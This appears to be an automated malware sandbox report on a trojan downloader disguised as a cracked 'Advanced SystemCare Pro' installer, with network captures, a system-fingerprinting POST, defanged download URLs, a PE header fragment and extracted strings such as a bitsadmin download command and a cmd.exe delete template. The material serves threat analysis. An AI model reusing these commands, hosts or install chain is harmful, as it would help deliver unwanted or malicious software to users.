Host: VVV.dosecuretrips.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="Setup__2140_il2.exe"
Content-Type: application/x-msdownload
Date: Tue, 03 Jan 2017 04:54:02 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 03 Jan 2017 04:54:02 GMT
Pragma: no-cache
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: Setup__2140_il2.exe
Content-Length: 716288
Connection: CloseMZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........<...R..
.R...R.u.....R..4....R.......R..4..Q.R.......R..4....R...R...R.......R
.......R...S...R..4....R..4....R..4....R.Rich..R......................
...PE..L.....3X.................`...................p....@............
..............@............@..........................................
...8E......................DZ.. u..................................@..
..........p..\............................text...._.......`...........
....... ..`.rdata..T....p.......d..............@..@.data....[...0...4.
.................@....rsrc...8E.......F...J..............@..@.reloc..4
].......^..................@..B.......................................
......................................................................
......................................................................
......................................................................
................................................ ..........3.9.....V..
......D$.....^...j .UNF..#...3.9.tRj.h|.F..M..E......]..].......]..}..
.E.s..E.SSS.6Ph..F......YY...6...tF.Sj..M.......I....3..H..H....3...uH
..|uH..xuH..tuH...uH..tuH..3.9..HH.t..=.HH....HH.s...HH..j...SF.......
}.j.....F.X3.3..G.._.f.O..]..G83.._4f.G$.u..w@.E........Gp....._l3.f.G
\........F............................................................
................................_x._|................V........D$..t.V.
c=..Y..^...j...SF......j...vH.X3.3..}....vH...F...vH....vH.f...vH.<<< skipped >>>
GET /launch_v5.php?p=sevenzip&pid=2735&tid=11671248&b_typ=pe&n=QWR2YW5jZWQgU3lzdGVtQ2FyZSBQcm8gMTAuMC4z&reb=1&ic= HTTP/1.0
Host: get.enomenalco.club
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 974
Connection: close
Date: Tue, 03 Jan 2017 04:53:57 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 6296292885688507e00160ec3af83700.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Bx7aaCpJIIdzXDvJuC5Sf5j1Eaaj2l9fA9bZX0M3544YO7KRX0Pe1Q==files=4.t1=dl.u1=hXXp://VVV.dosecuretrips.com/download.php?version=1.1
.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/do
wnloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cm
dline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_
installer.png.n1=Setup__2140_il2.exe.b1=am.c1=2140-sevenzip.s1=0.m1=0.
d1=0.t2=dl.u2=hXXp://promos-back.peerdlgo.info/stub/open_maker.php?dl=
1.n2=open.exe.b2=op.c2=sevenzip-1.s2=0.m2=0.d2=0.t3=dl.u3=hXXp://get.c
dzhugashvili.bid/?affId=1006&appTitle=Advanced%20SystemCare%20Pro%
252010.0.3&s1=2735&s2=11671248&setupName=cpSetup&appVersion=2.92&instI
d=11&exe=1.n3=cpSetup.exe.b3=cp.c3=sevenzip-1.s3=0.m3=0.d3=0.t4=dl.u4=
hXXp://slibby.ineddramatiseo.bid/stub_maker_uk2.php?url=hXXp://excurso
r.info/taveara?q=Advanced SystemCare Pro 10.0.3.n4=sevensetup.ex
e.b4=rx.c4=sevenzip-1.s4=0.m4=0.d4=0.fn1=Components.fn2=File opener.fn
3=File finder.fn4=SevenZip.ftitle=to run your file.itype=silent...
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 03 Jan 2017 04:54:12 GMT
Server: Apache
Set-Cookie: vsid=916vr2309648528521496; expires=Sun, 02-Jan-2022 04:54:12 GMT; path=/; domain=cdn2.leadingdownload.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 195
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8..........].1..0.E.B. <.KB.tJ.u...[u...d....1..N......9-~<......
PB.....'NQ...(.A.F......c-..T..<.....x{lLl.=.....0.R .....ai...@c..
`"0...72...#.!..6~.D..4.*..!...,,.X,.....v.........L[?...i......HTTP/1
.1 200 OK..Date: Tue, 03 Jan 2017 04:54:12 GMT..Server: Apache..Set-Co
okie: vsid=916vr2309648528521496; expires=Sun, 02-Jan-2022 04:54:12 GM
T; path=/; domain=cdn2.leadingdownload.com; httponly..Vary: Accept-Enc
oding,User-Agent..Content-Encoding: gzip..Content-Length: 195..Keep-Al
ive: timeout=5, max=94..Connection: Keep-Alive..Content-Type: text/htm
l; charset=UTF-8............].1..0.E.B. <.KB.tJ.u...[u...d....1..N.
.....9-~<........
GET /launch_reb.php?p=sevenzip&tid=11671248&pid=2735&n=QWR2YW5jZWQgU3lzdGVtQ2FyZSBQcm8gMTAuMC4zLjY3MSBNdWx0aWxpbmd1YWwgKyBMaWNlbnNlIEtleXMgKyBQb3J0YWJsZQ==&b_typ=pe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: get.ercationiv.club
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 192
Connection: keep-alive
Date: Tue, 03 Jan 2017 04:53:56 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 95a477af435073615179b256d8101334.cloudfront.net (CloudFront)
X-Amz-Cf-Id: USJEb5c5PXn0b3yJVByqzRFl9isxLnfG_wEYgH5ePBbypPEE5Y24EA==s=first..u=hXXp://jump.meunidealized.bid/stub_maker.php?program=sevenz
ip&tid=11671248&pid=2735&b_typ=pe&reb=1&name=Advanced SystemCare Pro 1
0.0.3.671 Multilingual + License Keys + PortableHTTP/1.1 200 OK..C
ontent-Type: text/html; charset=UTF-8..Content-Length: 192..Connection
: keep-alive..Date: Tue, 03 Jan 2017 04:53:56 GMT..Server: Apache/2.2.
15 (CentOS)..X-Powered-By: PHP/5.3.3..X-Cache: Miss from cloudfront..V
ia: 1.1 95a477af435073615179b256d8101334.cloudfront.net (CloudFront)..
X-Amz-Cf-Id: USJEb5c5PXn0b3yJVByqzRFl9isxLnfG_wEYgH5ePBbypPEE5Y24EA==.
.s=first..u=hXXp://jump.meunidealized.bid/stub_maker.php?program=seven
zip&tid=11671248&pid=2735&b_typ=pe&reb=1&name=Advanced SystemCare Pro
10.0.3.671 Multilingual + License Keys + Portable..
GET /V38/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: cdn1.leadingdownload.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 03 Jan 2017 04:54:12 GMT
Server: Apache
Set-Cookie: vsid=913vr2309648528910848; expires=Sun, 02-Jan-2022 04:54:12 GMT; path=/; domain=cdn1.leadingdownload.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 193
Keep-Alive: timeout=5, max=105
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST /index.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.secularistsarakolet.site
Content-Length: 523
Connection: Keep-Alive
Cache-Control: no-cache
Net1.1=&Net2=3.5.30729.5420SP1&Net4=4.5.50709&OSversion=NT6.1SP1&Slv=&Sysid=541B298A93BFE2600111218F9ABFCC32&Sysid1=52D311BE788EE1E500992B8A6A042C2B&X64=N&admin=Y&browser=IE.HTTP&cavp=&chver=54.0.2840.59&cmdl=Setup__2140_il2.exe&dprod=D068E036AD104FFF0E13053E615F8D&dprod4=C275E3FEDEC17C9D31A2BE03568B64&exe=Setup__2140_il2&ffver=49.0.1.6109&lang_DfltUser=0409&mac=MDA1MDU2MzNCNTUxMDAwMAA=&machg=ODhkY2QzOTUtYjA2Mi00NWIzLWE2Y2QtNzlmMzdjMGViYTA4AA==&name=V0lOLVVLMEZGT084M0k2AA==&netfs=3&ts=1483419250&ver=1.1.5.26
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 03 Jan 2017 04:54:12 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive

37c1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<title>DownloadManagerModern</title>
<script type="text/javascript">
var g_notCompatibleWithUpdaterComps = ['LootFindKP'];
var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDuba', 'UCwebAccelerator', 'UltimateSecurityPackage', 'TotalSecurity', 'TotalSecurityIN', 'TotalSecurityRU'];
</script>
<base href="hXXp://VVV.secularistsarakolet.site:80/index.php" />
<link rel="stylesheet" type="text/css" href="hXXp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" />
<script type="text/javascript" src="hXXp://cdn1.leadingdownload.com/V38/amipb.js"></script>
<script type="text/javascript">
var g_r_appimageurl="http:\/\/pe-sixi.com\/img\/icon_installer.png";
var g_r_appname="installer";
var g_r_cmdline="\/S";
var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_additional_offer_list = '1';
var g_finish_install_button = '1';
var g_popup_install_all = '1';
var g_eula = 'VGhlIGRvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZpbGUgaXMgcnVuIGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4KQnkgY2xpY2tpbmcgdGhlICJBY2NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51aW5nIHRoaXMgSW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiwgb3Igb3<<< skipped >>>
GET /stub_maker.php?program=sevenzip&tid=11671248&pid=2735&b_typ=pe&reb=1&name=Advanced SystemCare Pro 10.0.3.671 Multilingual + License Keys + Portable HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: jump.meunidealized.bid
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 67424
Connection: keep-alive
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="586abfc3362cc.exe"
X-Powered-By: ASP.NET
Date: Mon, 02 Jan 2017 21:01:55 GMT
Age: 28314
X-Cache: Hit from cloudfront
Via: 1.1 59230305fa4e8eba32de075786d44476.cloudfront.net (CloudFront)
X-Amz-Cf-Id: yjB7YInpEKROFoTlvXoOEcqqYTBV72JXylCe_gK1YbWhyakiNhoCuQ==
The Trojan connects to the servers at the following location(s):
.text
`.rdata
@.data
.ndata
.rsrc
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\LF4X4VJWFp.exe
ip&tid=11671248&pid=2735&b_typ=pe&reb=1&name=Advanced SystemCare Pro 10.0.3.671 Multilingual + License Keys + Portable
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\inetc.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp
?program=sevenzip&tid=11671248&pid=2735&b_typ=pe&reb=1&name=Advanced SystemCare Pro 10.0.3.671 Multilingual + License Keys + Portable
@.reloc
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
.reloc
System.dll
callback%d
nsx2DD4.tmp
\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\U6cgvnDPb5
venzip&tid=11671248&pid=2735&b_typ=pe&reb=1&name=Advanced SystemCare Pro 10.0.3.671 Multilingual + License Keys + Portable
ump.meunidealized.bid/stub_maker.php?program=sevenzip&tid=11671248&pid=2735&b_typ=pe&reb=1&name=Advanced SystemCare Pro 10.0.3.671 Multilingual + License Keys + Portable
c:\%original file name%.exe
%original file name%.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nss2BE0.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
201701030453
hXXp://jump.meunidealized.bid/stub_maker.php?program=sevenzip&tid=11671248&pid=2735&b_typ=pe&reb=1&name=Advanced SystemCare Pro 10.0.3.671 Multilingual + License Keys + Portable
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
%original file name%.exe_2012_rwx_10004000_00001000:
callback%d
LF4X4VJWFp.exe_2880:
.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
WS2_32.dll
NSISdl.dll
KERNEL32.DLL
nsArray.dll
Join
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
"C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\sevensetup.exe"
excursor.info/taveara?q=Advanced SystemCare Pro 10.0.3
Setup&appVersion=2.92&instId=11&exe=1
[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\NSISdl.dll
\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp
\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\NSISdl.dll
%Program Files%
\NSISdl.dll
\706703874
hXXp://get.gunnightmar.club/stats.php?bu=
\nsArray.dll
ar_url
\\706703874
hXXp://get.iestharvest.club/error.php?string=
Advanced SystemCare Pro 10.0.3
hXXp://get.enomenalco.club/launch_v5.php?p=sevenzip&pid=2735&tid=11671248&b_typ=pe&n=
hXXp://get.ntemptheav.club/launch_v5.php?p=sevenzip&pid=2735&tid=11671248&b_typ=pe&n=
/key=
Nullsoft Install System (Unicode) v2.46.5-Unicode
\wininit.ini
Software\Microsoft\Windows\CurrentVersion\Internet Settings
1.1.1.6
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp
sevensetup.exe
SEVENS~1.EXE
Exec: success (""C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\sevensetup.exe"")
//excursor.info/taveara?q=Advanced SystemCare Pro 10.0.3
pSetup&appVersion=2.92&instId=11&exe=1
d[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
Advanced SystemCare Pro 10.0.3 Setup
l=hXXp://excursor.info/taveara?q=Advanced SystemCare Pro 10.0.3
eddramatiseo.bid/stub_maker_uk2.php?url=hXXp://excursor.info/taveara?q=Advanced SystemCare Pro 10.0.3
123456789 /
dvanced SystemCare Pro 10.0.3
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\LF4X4VJWFp.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp
LF4X4VJWFp.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nsd49FB.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
3157555
hXXp://slibby.ineddramatiseo.bid/stub_maker_uk2.php?url=hXXp://excursor.info/taveara?q=Advanced SystemCare Pro 10.0.3
hXXp://promos-back.peerdlgo.info/stub/open_maker.php?dl=1
hXXp://get.enomenalco.club/launch_v5.php?p=sevenzip&pid=2735&tid=11671248&b_typ=pe&n=QWR2YW5jZWQgU3lzdGVtQ2FyZSBQcm8gMTAuMC4z&reb=1&ic=
Setup__2140_il2.exe_192:
.text
`.rdata
@.data
.rsrc
@.reloc
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
WinHttpSetStatusCallback
Failed to get the Temp folder: %d
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::SetComponentInstallationEnded %S
%Y-%m-%d %H:%M:%S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::ProgressUpdate %S
Send progress update request %s
Progress Request for '%S' return %s
%c%c%c%c
C:\Amon\AmonSystemBs\BootStrapper\ProductionNoSign\Launcher.pdb
VERSION.dll
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
Secur32.dll
WinHttpCloseHandle
WinHttpOpen
WinHttpSetOption
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WINHTTP.dll
GetProcessHeap
GetCPInfo
.?AVAsyncWinHttp@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AUISupportErrorInfo@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
vinyls.tramell.1 = s 'Inst Class'
CLSID = s '{dded0858-104b-4eec-a82e-a44b49d78594}'
vinyls.tramell = s 'Inst Class'
CurVer = s 'vinyls.tramell.1'
ForceRemove {dded0858-104b-4eec-a82e-a44b49d78594} = s 'Inst Class'
ProgID = s 'vinyls.tramell.1'
VersionIndependentProgID = s 'vinyls.tramell'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{a0e998a2-81f0-420b-a12b-563442cf5349}'
<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/><ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
stdole2.tlb
msgWd
keyNameW
urlW
url2d
YtcmdLineW
P%CreateIconWW
iconUrlW
regKeyWW
CheckRegKeyW
keyWd
W.launchCommandLineWWW
~cmdW
WDIsShortNameInstalledd
Created by MIDL version 7.00.0555 at Mon Nov 21 09:30:06 2016
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
KERNEL32.DLL
ADVAPI32.DLL
USER32.DLL
Winhttp.dll
Content-Type: application/x-www-form-urlencoded
shlwapi.dll
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
appimageurl
cmdl
capp=%s&cid=%s&mhx=%S&base=%s
\bitsadmin.exe
\Support Tools\bitsadmin.exe
%sami%s%d%d.exe
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:-:00
/retrynav %d
Advapi32.dll
shell32.dll
{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}
OLEAUT32.DLL
kernel32.dll
sn=%s&hx=%S&base=%s
rfsw%d
advapi32.dll
v2.0.50727
v1.1.4322
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
NT%d.%dSP%d
ami%sExd
bitsadmin /transfer amijob /download /priority high %s %s
ami%sExi
/c del "%s"
cmd.exe
%TEMP%\task.vbs
ami%sExdel
version.dll
OleAut32.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\Setup__2140_il2.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
1.1.5.26
setup.exe
secularistsarakolet.site
sevensetup.exe_2504:
.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
FtpCommandW
Filename: %s
MSVCRT.dll
HttpSendRequestW
HttpSendRequestExW
HttpQueryInfoW
FtpCreateDirectoryW
FtpOpenFileW
HttpAddRequestHeadersA
HttpAddRequestHeadersW
HttpOpenRequestW
HttpEndRequestW
InternetCrackUrlW
WININET.dll
inetc.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
